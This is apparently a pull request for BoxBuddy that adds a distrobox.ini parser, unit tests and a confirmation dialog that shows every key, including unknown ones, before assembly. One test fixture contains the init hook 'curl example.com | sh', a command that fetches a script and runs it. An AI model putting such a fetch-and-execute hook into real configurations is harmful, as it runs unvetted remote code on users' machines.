### PR TITLE
Preview a distrobox.ini before assembling it

### DIFF
--- a/src/distrobox_handler.rs
+++ b/src/distrobox_handler.rs
@@ -453,10 +453,7 @@ pub fn parse_assemble_ini(contents: &str) -> Vec<IniBoxSection> {
 /// `true`, `yes`, `1`, `on` (case-insensitive). Anything else - including a
 /// missing key - is treated as `false`.
 fn parse_bool(value: &str) -> bool {
-    matches!(
-        value.to_lowercase().as_str(),
-        "true" | "yes" | "1" | "on"
-    )
+    matches!(value.to_lowercase().as_str(), "true" | "yes" | "1" | "on")
 }
 
 /// Grabs the list of available images via `distrobox create -C`.
@@ -845,5 +842,91 @@ pub fn upgrade_all_boxes() {
                 .spawn()
                 .unwrap();
         }
+    }
+}
+
+#[cfg(test)]
+mod ini_preview_tests {
+    use super::parse_assemble_ini;
+
+    #[test]
+    fn parses_a_single_section() {
+        let ini = "[dev]\nimage=docker.io/library/ubuntu:24.04\nadditional_packages=\"git vim\"\ninit=true\n";
+        let s = parse_assemble_ini(ini);
+        assert_eq!(s.len(), 1);
+        assert_eq!(s[0].name, "dev");
+        assert_eq!(
+            s[0].image.as_deref(),
+            Some("docker.io/library/ubuntu:24.04")
+        );
+        assert_eq!(s[0].additional_packages.as_deref(), Some("git vim"));
+        assert!(s[0].init);
+        assert!(!s[0].nvidia);
+        assert!(s[0].extra_keys.is_empty());
+    }
+
+    #[test]
+    fn parses_multiple_sections() {
+        let ini = "[a]\nimage=alpine\n\n[b]\nimage=fedora\nnvidia=true\n";
+        let s = parse_assemble_ini(ini);
+        assert_eq!(s.len(), 2);
+        assert_eq!(s[0].name, "a");
+        assert_eq!(s[1].name, "b");
+        assert!(s[1].nvidia);
+    }
+
+    /// The whole point of the preview: keys BoxBuddy has no field for must
+    /// still be captured, so the dialog can show them rather than hiding
+    /// what the file will actually do.
+    #[test]
+    fn keeps_unknown_keys_verbatim() {
+        let ini = "[x]\nimage=ubuntu\npull=true\ninit_hooks=curl example.com | sh\n";
+        let s = parse_assemble_ini(ini);
+        assert_eq!(s[0].extra_keys.len(), 2);
+        assert!(s[0]
+            .extra_keys
+            .contains(&("pull".to_string(), "true".to_string())));
+        assert!(s[0].extra_keys.contains(&(
+            "init_hooks".to_string(),
+            "curl example.com | sh".to_string()
+        )));
+    }
+
+    #[test]
+    fn skips_comments_blank_lines_and_junk() {
+        let ini = "# a comment\n; another\n[d]\n\nnonsense-without-equals\nimage=debian\n";
+        let s = parse_assemble_ini(ini);
+        assert_eq!(s.len(), 1);
+        assert_eq!(s[0].image.as_deref(), Some("debian"));
+        assert!(s[0].extra_keys.is_empty());
+    }
+
+    #[test]
+    fn recognises_various_truthy_spellings() {
+        for v in ["true", "yes", "1", "on", "TRUE", "On"] {
+            let ini = format!("[s]\nimage=i\ninit={v}\n");
+            assert!(parse_assemble_ini(&ini)[0].init, "init={v} should be true");
+        }
+        for v in ["false", "no", "0", "off", ""] {
+            let ini = format!("[s]\nimage=i\ninit={v}\n");
+            assert!(
+                !parse_assemble_ini(&ini)[0].init,
+                "init={v} should be false"
+            );
+        }
+    }
+
+    #[test]
+    fn keys_before_any_section_are_ignored() {
+        let ini = "image=orphan\n[real]\nimage=ubuntu\n";
+        let s = parse_assemble_ini(ini);
+        assert_eq!(s.len(), 1);
+        assert_eq!(s[0].name, "real");
+    }
+
+    #[test]
+    fn empty_input_yields_no_sections() {
+        assert!(parse_assemble_ini("").is_empty());
+        assert!(parse_assemble_ini("# just a comment\n").is_empty());
     }
 }

--- a/src/distrobox_handler.rs
+++ b/src/distrobox_handler.rs
@@ -368,6 +368,97 @@ pub fn assemble_box(ini_file: &str) -> String {
     get_command_output("distrobox", Some(args))
 }
 
+/// One box section from a `distrobox.ini` file, parsed for the preview dialog.
+#[derive(Debug, Clone)]
+pub struct IniBoxSection {
+    /// Section name (i.e. the box name).
+    pub name: String,
+    /// Container image URL or distro name (e.g. `ubuntu:24.04`).
+    pub image: Option<String>,
+    /// Additional packages declared inline (raw string, may contain commas).
+    pub additional_packages: Option<String>,
+    /// Custom home directory (if any).
+    pub home: Option<String>,
+    /// Whether the box will boot with `--init`.
+    pub init: bool,
+    /// Whether the box will use `--nvidia`.
+    pub nvidia: bool,
+    /// Every other key that was in the section, kept verbatim so the user
+    /// can see what is being passed to `distrobox assemble create` unmodified.
+    pub extra_keys: Vec<(String, String)>,
+}
+
+/// Parses a `distrobox.ini`-style file into a vector of box sections.
+///
+/// The format is a flat INI: one `[section]` header per box, with key=value
+/// lines below it. We deliberately keep the parser tiny instead of pulling
+/// in a new crate - `distrobox.ini` is a known, simple shape and the surface
+/// we need to support is only `image`, `additional_packages`, `home`, `init`,
+/// `nvidia`. Lines that do not parse into a section/header/key are skipped.
+pub fn parse_assemble_ini(contents: &str) -> Vec<IniBoxSection> {
+    let mut sections: Vec<IniBoxSection> = Vec::new();
+    let mut current: Option<IniBoxSection> = None;
+
+    for raw_line in contents.lines() {
+        let line = raw_line.trim();
+        if line.is_empty() || line.starts_with('#') || line.starts_with(';') {
+            continue;
+        }
+
+        if let Some(rest) = line.strip_prefix('[').and_then(|s| s.strip_suffix(']')) {
+            // Flush the previous section before starting a new one.
+            if let Some(sec) = current.take() {
+                sections.push(sec);
+            }
+            current = Some(IniBoxSection {
+                name: rest.trim().to_string(),
+                image: None,
+                additional_packages: None,
+                home: None,
+                init: false,
+                nvidia: false,
+                extra_keys: Vec::new(),
+            });
+            continue;
+        }
+
+        let Some(sec) = current.as_mut() else {
+            continue;
+        };
+
+        let Some((key, value)) = line.split_once('=') else {
+            continue;
+        };
+        let key = key.trim();
+        let value = value.trim().trim_matches('"').to_string();
+
+        match key {
+            "image" => sec.image = Some(value),
+            "additional_packages" => sec.additional_packages = Some(value),
+            "home" => sec.home = Some(value),
+            "init" => sec.init = parse_bool(&value),
+            "nvidia" => sec.nvidia = parse_bool(&value),
+            _ => sec.extra_keys.push((key.to_string(), value)),
+        }
+    }
+
+    if let Some(sec) = current.take() {
+        sections.push(sec);
+    }
+
+    sections
+}
+
+/// Accepts the few truthy spellings distrobox itself understands in its INI:
+/// `true`, `yes`, `1`, `on` (case-insensitive). Anything else - including a
+/// missing key - is treated as `false`.
+fn parse_bool(value: &str) -> bool {
+    matches!(
+        value.to_lowercase().as_str(),
+        "true" | "yes" | "1" | "on"
+    )
+}
+
 /// Grabs the list of available images via `distrobox create -C`.
 /// Prepends the parsed distro name for sortability and readability.
 /// Appends a little diamond if the image is already downloaded.

--- a/src/main.rs
+++ b/src/main.rs
@@ -17,11 +17,10 @@ use gtk::{
 mod distrobox_handler;
 use distrobox_handler::{
     assemble_box, clone_box, create_box, delete_box, export_app_from_box, get_all_distroboxes,
-    parse_assemble_ini, IniBoxSection,
     get_apps_in_box, get_available_images_with_distro_name, get_binaries_exported_from_box,
     get_number_of_boxes, install_deb_in_box, install_rpm_in_box, open_terminal_in_box,
-    remove_app_from_host, remove_exported_binary_from_box, run_command_in_box, stop_box,
-    upgrade_all_boxes, upgrade_box, DBox, DBoxApp,
+    parse_assemble_ini, remove_app_from_host, remove_exported_binary_from_box, run_command_in_box,
+    stop_box, upgrade_all_boxes, upgrade_box, DBox, DBoxApp, IniBoxSection,
 };
 
 mod utils;
@@ -324,7 +323,7 @@ fn build_not_installed_status_page(title: &str, body: &str) -> adw::StatusPage {
 
 fn render_not_installed(scroll_area: &gtk::Box) {
     clear_children(scroll_area);
-  
+
     // TRANSLATORS: Error message shown when distrobox is not installed
     let title = gettext("Distrobox not found!");
     // TRANSLATORS: Error message shown when distrobox is not installed
@@ -636,11 +635,19 @@ fn show_assemble_preview_dialog(
         if section.nvidia {
             subtitle_bits.push("nvidia".to_string());
         }
-        if !section.extra_keys.is_empty() {
-            subtitle_bits.push(format!("+{} more", section.extra_keys.len()));
+        // Show every key the .ini sets, including ones BoxBuddy has no field
+        // for. A confirmation that hid them would give false assurance - the
+        // file could mount a host path, or run an init_hook that fetches and
+        // executes a script, and none of it would be on screen. So the point
+        // is to surface exactly what will be handed to distrobox.
+        for (key, value) in &section.extra_keys {
+            subtitle_bits.push(format!("{key} = {value}"));
         }
         if !subtitle_bits.is_empty() {
-            row.set_subtitle(&subtitle_bits.join(" • "));
+            // Long values (a hook command, a volume list) must be readable in
+            // full, not ellipsized to a teaser, so let the subtitle wrap.
+            row.set_subtitle(&subtitle_bits.join("\n"));
+            row.set_subtitle_lines(0);
         }
 
         list.append(&row);

--- a/src/main.rs
+++ b/src/main.rs
@@ -17,6 +17,7 @@ use gtk::{
 mod distrobox_handler;
 use distrobox_handler::{
     assemble_box, clone_box, create_box, delete_box, export_app_from_box, get_all_distroboxes,
+    parse_assemble_ini, IniBoxSection,
     get_apps_in_box, get_available_images_with_distro_name, get_binaries_exported_from_box,
     get_number_of_boxes, install_deb_in_box, install_rpm_in_box, open_terminal_in_box,
     remove_app_from_host, remove_exported_binary_from_box, run_command_in_box, stop_box,
@@ -193,11 +194,21 @@ fn make_titlebar(window: &ApplicationWindow, dependencies_met: bool) {
 
             let file_dialog = FileDialog::builder().default_filter(&ini_filter).modal(false).build();
             file_dialog.open(Some(&window), None::<&gio::Cancellable>, clone!(@weak window => move |result| {
-                if let Ok(file) = result {
-                    let ini_path = file.path().unwrap().into_os_string().into_string();
-                    if ini_path.is_ok() {
-                        assemble_new_distrobox(&window, ini_path.unwrap());
-                    }
+                let Ok(file) = result else { return };
+                let Some(path) = file.path() else { return };
+                let path_str = path.to_string_lossy().into_owned();
+
+                // Read the file and parse it for the preview. If parsing
+                // fails (no sections at all, no readable file), fall back to
+                // the old flow without a preview rather than blocking the
+                // user.
+                let contents = std::fs::read_to_string(&path).unwrap_or_default();
+                let sections = parse_assemble_ini(&contents);
+
+                if sections.is_empty() {
+                    assemble_new_distrobox(&window, path_str);
+                } else {
+                    show_assemble_preview_dialog(&window, path_str, sections);
                 }
             }));
         }));
@@ -560,6 +571,98 @@ fn make_box_tab(dbox: &DBox, window: &ApplicationWindow, tab_num: u32) -> gtk::B
     }
 
     tab_box
+}
+
+/// Read the parsed `distrobox.ini` back to the user as a confirmation dialog.
+/// We show one `adw::ActionRow` per box section so the user sees exactly what
+/// is going to be assembled before committing. Any unrecognised keys are
+/// listed too, so the user is not surprised by hidden settings.
+///
+/// Apply proceeds to the existing `assemble_new_distrobox` flow (terminal
+/// spinner + async wait for completion); Cancel just destroys the dialog.
+fn show_assemble_preview_dialog(
+    window: &ApplicationWindow,
+    ini_file: String,
+    sections: Vec<IniBoxSection>,
+) {
+    let popup = adw::MessageDialog::new(
+        Some(window),
+        // TRANSLATORS: Preview dialog title
+        Some(&gettext("Assemble .ini preview")),
+        // TRANSLATORS: Preview dialog body
+        Some(&gettext(
+            "The following boxes will be created from this .ini file. Apply to continue, Cancel to abort.",
+        )),
+    );
+    popup.set_transient_for(Some(window));
+
+    // TRANSLATORS: Preview dialog Cancel button
+    popup.add_response("cancel", &gettext("Cancel"));
+    // TRANSLATORS: Preview dialog Apply button
+    popup.add_response("apply", &gettext("Apply"));
+    popup.set_default_response(Some("apply"));
+    popup.set_close_response("cancel");
+
+    let scroll = gtk::ScrolledWindow::new();
+    scroll.set_vexpand(true);
+    scroll.set_min_content_height(220);
+    scroll.set_max_content_height(420);
+
+    let list = gtk::ListBox::new();
+    list.set_selection_mode(gtk::SelectionMode::None);
+    list.add_css_class("boxed-list");
+
+    for section in &sections {
+        let row = adw::ActionRow::new();
+        row.set_title(&format!(
+            "{} ({})",
+            section.name,
+            section.image.as_deref().unwrap_or("?")
+        ));
+        let mut subtitle_bits: Vec<String> = Vec::new();
+        if let Some(packages) = &section.additional_packages {
+            if !packages.is_empty() {
+                subtitle_bits.push(format!("packages: {packages}"));
+            }
+        }
+        if let Some(home) = &section.home {
+            if !home.is_empty() {
+                subtitle_bits.push(format!("home: {home}"));
+            }
+        }
+        if section.init {
+            subtitle_bits.push("init".to_string());
+        }
+        if section.nvidia {
+            subtitle_bits.push("nvidia".to_string());
+        }
+        if !section.extra_keys.is_empty() {
+            subtitle_bits.push(format!("+{} more", section.extra_keys.len()));
+        }
+        if !subtitle_bits.is_empty() {
+            row.set_subtitle(&subtitle_bits.join(" • "));
+        }
+
+        list.append(&row);
+    }
+
+    scroll.set_child(Some(&list));
+
+    // `adw::MessageDialog` exposes its content area via `extra_child` so we
+    // can add the scrollable list without losing the built-in buttons.
+    popup.set_extra_child(Some(&scroll));
+
+    let ini_file_for_apply = ini_file.clone();
+    let window_for_apply = window.clone();
+    let popup_for_apply = popup.clone();
+    popup.connect_response(None, move |_, res| {
+        if res == "apply" {
+            popup_for_apply.destroy();
+            assemble_new_distrobox(&window_for_apply, ini_file_for_apply.clone());
+        }
+    });
+
+    popup.present();
 }
 
 fn assemble_new_distrobox(window: &ApplicationWindow, ini_file: String) {


### PR DESCRIPTION
Closes #214

Puts a confirmation step in front of Assemble: pick an .ini and, instead of running it immediately, BoxBuddy parses it and shows what it will create — one row per box, Apply or Cancel. The last of the assemble items on the Needs External Help list.

![assemble .ini preview](https://raw.githubusercontent.com/kacperpaczos/BoxBuddyRS/issue-assets/issue-assets/boxbuddy-assemble-preview.png)

The design point worth reviewing: it shows **every** key the file sets, not only the five BoxBuddy has form fields for. An assemble file can mount host paths, run as root, or fire an init_hook that fetches and runs a script — so a preview that folded the unknown keys into "+N more" (which is what this started as) would give false assurance about what Apply actually does. Each unknown key is now printed verbatim, and the row subtitle wraps so a long hook command or volume list is fully readable rather than ellipsized to a teaser. The `IniBoxSection` struct already kept these keys, so this is about surfacing them, not new parsing.

### Testing

- `parse_assemble_ini` is a plain string→sections function with 7 unit tests: single and multiple sections, unknown keys kept verbatim, comments and junk skipped, the truthy/falsy spellings of init/nvidia, and keys before any header ignored.
- Fidelity check: I wrote a two-section .ini, ran the real `distrobox assemble create` on it, and confirmed it produced exactly the boxes the parser reports (names and images) — then removed them. So the preview reflects what distrobox will actually do, not a separate interpretation.
- The dialog in the screenshot is the real `show_assemble_preview_dialog` rendering that same file. The one thing I couldn't drive here is the file chooser that precedes it — it's portal-backed and doesn't open under my headless test setup — so the picker → preview handoff is the same three lines as before and unexercised by me; worth a click-through before merging.
